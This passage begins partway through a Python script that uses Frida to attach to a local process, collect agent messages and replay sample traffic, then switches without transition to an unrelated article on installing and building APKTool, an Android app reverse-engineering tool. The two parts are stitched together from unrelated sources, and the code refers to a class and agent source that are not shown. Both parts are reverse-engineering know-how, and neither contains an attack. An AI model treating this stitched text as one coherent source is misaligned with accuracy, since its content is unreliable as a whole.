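# on_message callback. Names and sizes are made up for the example.
SAMPLE_TRAFFIC = [
    ({"type": "send", "payload": {"event": "module", "name": "cat",
                                  "base": "0x400000", "size": 65536}}, None),
    ({"type": "send", "payload": {"event": "module", "name": "libc-2.15.so",
                                  "base": "0x7f0000000000", "size": 1900544}}, None),
    ({"type": "send", "payload": {"event": "module", "name": "ld-2.15.so",
                                  "base": "0x7f0000400000", "size": 147456}}, None),
    ({"type": "send", "payload": "hello from agent"}, b"\x01\x02"),
    ({"type": "error", "description": "ReferenceError: foo is not defined",
      "stack": "ReferenceError: foo is not defined\n    at <anonymous>",
      "fileName": "/script1.js", "lineNumber": 12, "columnNumber": 5}, None),
]


def replay(traffic=SAMPLE_TRAFFIC):
    """Feed recorded or constructed messages through a collector (offline)."""
    collector = MessageCollector()
    for message, data in traffic:
        collector.on_message(message, data)
    return collector


def run(target="cat"):
    """Live run against a process; needs frida installed and the target running."""
    import frida  # imported lazily so the offline parts work without it
    collector = MessageCollector()
    session = frida.attach(target)
    script = session.create_script(AGENT_SOURCE)
    script.on("message", collector.on_message)
    script.load()
    count = script.exports.enumerate_modules()  # same RPC call as example.py
    session.detach()
    return count, collector.summary()


if __name__ == "__main__":
    print(json.dumps(replay().summary(), indent=2))
```

Keeping the routing in a class rather than a bare print callback means the same handler serves both a live session (run()) and a replay of captured messages, which is how you would unit-test agent changes without re-attaching to a process each time.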



APKTool – A Tool for Reverse Engineering Android APK Files

APKTool is a tool for reverse engineering third-party, closed, binary Android apps. It can decode resources to nearly original form and rebuild them after making modifications, and it makes it possible to debug smali code step by step. It also makes working with an app easier thanks to its project-like file structure and the automation of repetitive tasks such as building the APK.

Note: It is NOT intended for piracy and other non-legal uses. It could be used for localizing, adding features or support for custom platforms, and other GOOD purposes. Just try to be fair with the authors of an app that you use and probably like.

Features

  • Disassembling resources to nearly original form (including resources.arsc, classes.dex, 9.png and XMLs)
  • Rebuilding decoded resources back to binary APK/JAR
  • Organizing and handling APKs that depend on framework resources
  • Smali Debugging (Removed in 2.1.0 in favor of IdeaSmali)
  • Helping with repetitive tasks

Requirements

  • Java 8 (JRE 1.8)
  • Basic knowledge of Android SDK, AAPT and smali

How To Install APKTool

  • Windows:
    • Download Windows wrapper script (Right click, Save Link As apktool.bat).
    • Download apktool.
    • Rename downloaded jar to apktool.jar.
    • Move both files (apktool.jar & apktool.bat) to your Windows directory (usually C:\Windows).
    • If you do not have write access to C:\Windows, you may place the two files anywhere and then add that directory to your System PATH environment variable.
    • Try running apktool via command prompt.
  • Linux:
    • Download Linux wrapper script (Right click, Save Link As apktool).
    • Download apktool.
    • Rename downloaded jar to apktool.jar.
    • Move both files (apktool.jar & apktool) to /usr/local/bin (root needed).
    • Make sure both files are executable (chmod +x).
    • Try running apktool via cli.
  • Mac OS X:
    • Download Mac wrapper script (Right click, Save Link As apktool).
    • Download apktool.
    • Rename downloaded jar to apktool.jar.
    • Move both files (apktool.jar & apktool) to /usr/local/bin (root needed).
    • Make sure both files are executable (chmod +x).
    • Try running apktool via cli.

Note: Wrapper scripts are not needed, but helpful so you don’t have to type java -jar apktool.jar over and over.

How to Build APKTool from Source

APKTool is a single project containing several sub-projects and a few dependencies.

  • brut.apktool.lib – (Main, all the Library code)
  • brut.apktool.cli – The cli interface of the program
  • brut.j.dir – Utility project
  • brut.j.util – Utility project
  • brut.j.common – Utility project

Requirements:

  • JDK8 (Oracle or OpenJDK)
  • git

Build Steps:

  1. Clone the repository: git clone git://github.com/iBotPeaches/Apktool.git
  2. cd Apktool
  3. For steps 3-5 use ./gradlew on Unix-based systems or gradlew.bat on Windows.
  4. [./gradlew][gradlew.bat] build shadowJar – Builds Apktool, including the final binary.
  5. Optional (builds a Proguard jar): [./gradlew][gradlew.bat] build shadowJar proguard

After build completes you should have a jar file at:
./brut.apktool/apktool-cli/build/libs/apktool-xxxxx.jar

Windows Requirements

Windows imposes a maximum file path length. At one location in APKTool there is a 218-character directory path, which, given the 255-character limit on Windows, means we need to enforce some requirements.

This leaves 37 characters in total for the path into which the project is cloned on Windows. For example, we can clone this project to the location.

This is 31 characters, which allows APKTool to be cloned properly. Cloning the project into a directory whose path is longer than 37 characters will not work.
